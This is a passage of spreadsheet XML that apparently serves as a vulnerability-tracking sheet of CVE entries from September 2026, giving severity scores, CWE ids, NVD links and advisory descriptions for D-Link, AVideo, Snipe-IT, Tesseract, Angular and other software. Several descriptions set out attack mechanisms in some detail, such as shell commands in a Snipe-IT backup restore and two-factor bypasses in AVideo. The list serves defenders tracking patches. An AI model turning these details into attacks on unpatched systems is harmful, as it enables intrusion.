      </c>
      <c r="G1478" s="5" t="inlineStr"/>
      <c r="H1478" s="5" t="inlineStr"/>
      <c r="I1478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1478" s="5" t="inlineStr"/>
      <c r="K1478" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="L1478" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M1478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t>
        </is>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86510</t>
        </is>
      </c>
      <c r="C1479" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1479" s="5" t="inlineStr"/>
      <c r="F1479" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1479" s="5" t="inlineStr"/>
      <c r="H1479" s="5" t="inlineStr"/>
      <c r="I1479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1479" s="5" t="inlineStr"/>
      <c r="K1479" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="L1479" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in D-Link DIR-822A A_101. Affected is the function tunnel_set_params of the component L2TP Control Message Parser. Such manipulation leads to out-of-bounds write. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M1479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t>
        </is>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86712</t>
        </is>
      </c>
      <c r="C1480" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1480" s="5" t="inlineStr"/>
      <c r="F1480" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1480" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1480" s="5" t="inlineStr"/>
      <c r="I1480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1480" s="5" t="inlineStr"/>
      <c r="K1480" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1480" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.2 trusts the attacker-writable text/siyuan clipboard MIME type and skips sanitization in the paste handler, allowing code execution in the Node-enabled desktop renderer. Attackers can craft malicious web pages that write to the clipboard, and when pasted into SiYuan, injected scripts execute with full Node.js access through the Electron main process.</t>
        </is>
      </c>
      <c r="M1480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t>
        </is>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86720</t>
        </is>
      </c>
      <c r="C1481" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1481" s="5" t="inlineStr"/>
      <c r="F1481" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1481" s="5" t="inlineStr"/>
      <c r="H1481" s="5" t="inlineStr"/>
      <c r="I1481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1481" s="5" t="inlineStr"/>
      <c r="K1481" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1481" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ownership of live_restreams_id in resendRestreamer.json.php, allowing authenticated users with canStream to access other users' restream destinations. Attackers can broadcast their live stream to victim-configured restream destinations by supplying arbitrary live_restreams_id values, hijacking YouTube, Facebook, or Twitch streams using victim stream keys.</t>
        </is>
      </c>
      <c r="M1481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t>
        </is>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86722</t>
        </is>
      </c>
      <c r="C1482" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1482" s="5" t="inlineStr"/>
      <c r="F1482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1482" s="5" t="inlineStr"/>
      <c r="H1482" s="5" t="inlineStr"/>
      <c r="I1482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1482" s="5" t="inlineStr"/>
      <c r="K1482" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1482" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability where sqlDAL caches empty result sets that writeSql never invalidates. Attackers with a valid password can bypass email two-factor authentication on new devices because the confirmation code hash fails to generate from the stale cached empty result.</t>
        </is>
      </c>
      <c r="M1482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t>
        </is>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86723</t>
        </is>
      </c>
      <c r="C1483" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1483" s="5" t="inlineStr"/>
      <c r="F1483" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1483" s="5" t="inlineStr"/>
      <c r="H1483" s="5" t="inlineStr"/>
      <c r="I1483" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1483" s="5" t="inlineStr"/>
      <c r="K1483" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1483" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability in LoginControl::verifyChallenge() that uses loose comparison (==) instead of strict comparison (===) against unset session values. Attackers with only a password can submit an empty request to verifyChallenge.json.php to bypass PGP two-factor authentication and gain full authenticated access.</t>
        </is>
      </c>
      <c r="M1483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t>
        </is>
      </c>
    </row>
    <row r="1484">
      <c r="A1484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86733</t>
        </is>
      </c>
      <c r="C1484" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1484" s="5" t="inlineStr"/>
      <c r="F1484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1484" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1484" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I1484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1484" s="5" t="inlineStr"/>
      <c r="K1484" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1484" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client (`mysql`) without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as `\!` as local shell commands. An authenticated superadministrator who uploads a crafted ZIP backup (POST /admin/backups/upload) and triggers a restore (POST /admin/backups/restore/{filename}) without the optional `clean` sanitizer parameter — which is not applied by default because DB_SANITIZE_BY_DEFAULT is false — can execute arbitrary OS commands as the web application's operating-system user, exposing application secrets (including database credentials and APP_KEY) and allowing modification of application-writable files and data. Version 8.7.0 adds the --binary-mode flag to the client invocation.</t>
        </is>
      </c>
      <c r="M1484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t>
        </is>
      </c>
    </row>
    <row r="1485">
      <c r="A1485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86762</t>
        </is>
      </c>
      <c r="C1485" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1485" s="5" t="inlineStr"/>
      <c r="F1485" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1485" s="5" t="inlineStr"/>
      <c r="H1485" s="5" t="inlineStr"/>
      <c r="I1485" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1485" s="5" t="inlineStr"/>
      <c r="K1485" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1485" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 does not apply the CheckUserIsActivated middleware to the `api` middleware group in app/Http/Kernel.php, and deactivating a user does not revoke that user's Passport personal access tokens. As a result, although a deactivated account is correctly refused at web login, its existing API token continues to authenticate and to grant read and write access to the REST API (assets, users, licenses, etc.) at the account's prior permission level until the token expires. A deactivated account that retains user-management permissions can re-activate itself through the API, permanently defeating the deactivation control.</t>
        </is>
      </c>
      <c r="M1485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86762</t>
        </is>
      </c>
    </row>
    <row r="1486">
      <c r="A1486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86770</t>
        </is>
      </c>
      <c r="C1486" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1486" s="5" t="inlineStr"/>
      <c r="F1486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1486" s="5" t="inlineStr"/>
      <c r="H1486" s="5" t="inlineStr"/>
      <c r="I1486" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1486" s="5" t="inlineStr"/>
      <c r="K1486" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L1486" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate username case sensitivity during SAML authentication, allowing attackers to authenticate as different users by registering IdP accounts with accent or case variants of victim usernames. Attackers can exploit the default utf8mb4_unicode_ci database collation to bypass username matching and achieve account takeover through federated login paths including SAML, LDAP, and OAuth.</t>
        </is>
      </c>
      <c r="M1486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86770</t>
        </is>
      </c>
    </row>
    <row r="1487">
      <c r="A1487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87633</t>
        </is>
      </c>
      <c r="C1487" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1487" s="5" t="inlineStr"/>
      <c r="F1487" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1487" s="5" t="inlineStr"/>
      <c r="H1487" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1487" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1487" s="5" t="inlineStr"/>
      <c r="K1487" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1487" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87633</t>
        </is>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87794</t>
        </is>
      </c>
      <c r="C1488" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1488" s="5" t="inlineStr"/>
      <c r="F1488" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1488" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1488" s="5" t="inlineStr"/>
      <c r="I1488" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1488" s="5" t="inlineStr"/>
      <c r="K1488" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1488" s="5" t="inlineStr">
        <is>
          <t>bestzip versions 2.2.6 and 3.0.2 contain an argument injection vulnerability in the nativeZip function that allows attackers to inject arbitrary arguments to the Info-ZIP backend. Attackers can supply a malicious destination path combined with crafted source entries to execute arbitrary commands with Node.js process privileges. Fixed in 2.2.7 and 3.0.3.</t>
        </is>
      </c>
      <c r="M1488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87794</t>
        </is>
      </c>
    </row>
    <row r="1489">
      <c r="A1489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87931</t>
        </is>
      </c>
      <c r="C1489" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1489" s="5" t="inlineStr"/>
      <c r="F1489" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1489" s="5" t="inlineStr"/>
      <c r="H1489" s="5" t="inlineStr"/>
      <c r="I1489" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1489" s="5" t="inlineStr"/>
      <c r="K1489" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="L1489" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Behavioral Technology Group Pavlok Behavioral Conditioning Wearable up to 20260707. Impacted is an unknown function of the component Apple Notification Center Service Event Handler. The manipulation leads to buffer overflow. The attack must be carried out from within the local network. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M1489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87931</t>
        </is>
      </c>
    </row>
    <row r="1490">
      <c r="A1490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88047</t>
        </is>
      </c>
      <c r="C1490" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1490" s="5" t="inlineStr"/>
      <c r="F1490" s="5" t="inlineStr"/>
      <c r="G1490" s="5" t="inlineStr"/>
      <c r="H1490" s="5" t="inlineStr"/>
      <c r="I1490" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1490" s="5" t="inlineStr"/>
      <c r="K1490" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1490" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Classify::ReadNormProtos in src/classify/normmatch.cpp parses the NORMPROTO component of a .traineddata file and uses std::istream::operator&gt;&gt;(char*) to extract a whitespace-delimited token into a fixed 61-byte stack buffer without setting a stream width. The 100-byte line buffer can carry a token of up to 99 characters, so a token longer than 60 characters writes up to 39 attacker-controlled bytes past the buffer during TessBaseAPI::Init of the legacy engine, causing stack corruption, denial of service, and potentially control-flow hijacking on affected standard-library implementations. Builds using Apple's libc++ C++20 bounded array overload are incidentally protected, while typical libstdc++ builds remain affected. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88047</t>
        </is>
      </c>
    </row>
    <row r="1491">
      <c r="A1491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88048</t>
        </is>
      </c>
      <c r="C1491" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1491" s="5" t="inlineStr"/>
      <c r="F1491" s="5" t="inlineStr"/>
      <c r="G1491" s="5" t="inlineStr"/>
      <c r="H1491" s="5" t="inlineStr"/>
      <c r="I1491" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1491" s="5" t="inlineStr"/>
      <c r="K1491" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-787</t>
        </is>
      </c>
      <c r="L1491" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, FullyConnected::DeSerialize in src/lstm/fullyconnected.cpp does not validate the deserialized layer scalars ni_ and no_ against the weight-matrix dimensions. During FullyConnected::Forward, MatrixDotVector in src/lstm/weightmatrix.cpp writes w.dim1() results into temp_line, which is sized from no_, and reads w.dim2() minus one inputs from curr_input, which is sized from ni_. A crafted .traineddata NT_SOFTMAX layer can therefore use inconsistent dimensions to cause a heap out-of-bounds write and read on the default LSTM engine, resulting in heap corruption, a crash, information disclosure, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88048</t>
        </is>
      </c>
    </row>
    <row r="1492">
      <c r="A1492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88049</t>
        </is>
      </c>
      <c r="C1492" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1492" s="5" t="inlineStr"/>
      <c r="F1492" s="5" t="inlineStr"/>
      <c r="G1492" s="5" t="inlineStr"/>
      <c r="H1492" s="5" t="inlineStr"/>
      <c r="I1492" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1492" s="5" t="inlineStr"/>
      <c r="K1492" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1492" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, prior .traineddata hardening added bounds checks to NetworkIO::CopyTimeStepGeneral and NetworkIO::Randomize in src/lstm/networkio.cpp but left NetworkIO::WriteTimeStepPart and NetworkIO::AddTimeStepPart unchecked. In LSTM::Forward in src/lstm/lstm.cpp, source_ is sized from the independently deserialized na_ field while the WriteTimeStepPart count is ns_, which comes from the CI gate WeightMatrix dim1() value. A crafted NT_LSTM layer can make ns_ much larger than na_, causing a heap out-of-bounds write during the first recognition step on the default LSTM engine and resulting in heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88049</t>
        </is>
      </c>
    </row>
    <row r="1493">
      <c r="A1493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88051</t>
        </is>
      </c>
      <c r="C1493" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1493" s="5" t="inlineStr"/>
      <c r="F1493" s="5" t="inlineStr"/>
      <c r="G1493" s="5" t="inlineStr"/>
      <c r="H1493" s="5" t="inlineStr"/>
      <c r="I1493" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1493" s="5" t="inlineStr"/>
      <c r="K1493" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1493" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, the callback form of GenericVector::read in src/ccutil/genericvector.h reads the independent int32 fields reserved and size_used_ from a .traineddata model without a cap or an invariant check. reserve(reserved) allocates the backing array, but the callback loop writes size_used_ elements. A crafted TESSDATA_INTTEMP component with version_id 4 or later can therefore set reserved to a small value and size_used_ to a large value when fontinfo_table_.read(fp, read_info) is called from src/classify/intproto.cpp, causing a heap out-of-bounds write of FontInfo structures, heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88051</t>
        </is>
      </c>
    </row>
    <row r="1494">
      <c r="A1494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88053</t>
        </is>
      </c>
      <c r="C1494" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1494" s="5" t="inlineStr"/>
      <c r="F1494" s="5" t="inlineStr"/>
      <c r="G1494" s="5" t="inlineStr"/>
      <c r="H1494" s="5" t="inlineStr"/>
      <c r="I1494" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1494" s="5" t="inlineStr"/>
      <c r="K1494" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1494" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Classify::ReadIntTemplates in src/classify/intproto.cpp reads NumClassPruners, NumClasses, and NumProtoSets from the TESSDATA_INTTEMP component of a crafted .traineddata file and uses those values as loop bounds without validating them against MAX_NUM_CLASS_PRUNERS, MAX_NUM_CLASSES, and MAX_NUM_PROTO_SETS. The loops store heap pointers into fixed-capacity ClassPruners and ProtoSets arrays in INT_TEMPLATES_STRUCT and INT_CLASS_STRUCT, so an oversized count causes heap out-of-bounds pointer writes during legacy-classifier initialization before OCR begins, resulting in heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88053</t>
        </is>
      </c>
    </row>
    <row r="1495">
      <c r="A1495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88056</t>
        </is>
      </c>
      <c r="C1495" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1495" s="5" t="inlineStr"/>
      <c r="F1495" s="5" t="inlineStr"/>
      <c r="G1495" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1495" s="5" t="inlineStr"/>
      <c r="I1495" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1495" s="5" t="inlineStr"/>
      <c r="K1495" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1495"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M1495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88056</t>
        </is>
      </c>
    </row>
    <row r="1496">
      <c r="A1496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="C1496" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1496" s="5" t="inlineStr"/>
      <c r="F1496" s="5" t="inlineStr"/>
      <c r="G1496" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1496" s="5" t="inlineStr"/>
      <c r="I1496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1496" s="5" t="inlineStr"/>
      <c r="K1496" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L1496" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes ProcessingInstruction DOM nodes inside fallback raw-content elements without escaping matching ancestor closing tags. ProcessingInstruction data escaped greater-than characters but left less-than characters untouched and did not inspect fallback ancestors, so data such as a matching closing tag prematurely terminates noscript, iframe, noembed, or noframes containers. The vulnerable nodes cannot be authored through standard Angular templates; reachability requires application or library code using inject(DOCUMENT).createProcessingInstruction with attacker-controlled data or Renderer2 DOM insertion inside a fallback container. In HTML5 RAWTEXT parsing, the premature close causes subsequent sibling elements to be interpreted as live HTML and enables arbitrary JavaScript execution in a victim's browser. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.</t>
        </is>
      </c>
      <c r="M1496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="1497">
      <c r="A1497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88060</t>
        </is>
      </c>
      <c r="C1497" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1497" s="5" t="inlineStr"/>
      <c r="F1497" s="5" t="inlineStr"/>
      <c r="G1497" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1497" s="5" t="inlineStr"/>
      <c r="I1497" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1497" s="5" t="inlineStr"/>
      <c r="K1497" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L1497" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes untrusted input inside template content nested in fallback raw-content elements such as noscript, iframe, noembed, and noframes. The Domino serializer's fallbackRawContentTags traversal stopped at the DocumentFragment used by template.content, so matching closing tags in xmp, style, script, comments, or text nodes were not escaped. Standard interpolation with comments or text nodes is reachable without relaxed schemas; literal xmp or style requires CUSTOM_ELEMENTS_SCHEMA or NO_ERRORS_SCHEMA, while Renderer2 imperative DOM construction is unconditionally affected. When HTML5 RAWTEXT browser parsing encounters the unescaped closing tag, it exits the fallback container and interprets trailing markup as active DOM elements, enabling arbitrary JavaScript execution. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.</t>
        </is>
      </c>
      <c r="M1497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88060</t>
        </is>
      </c>
    </row>
    <row r="1498">
      <c r="A1498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88863</t>
        </is>
      </c>
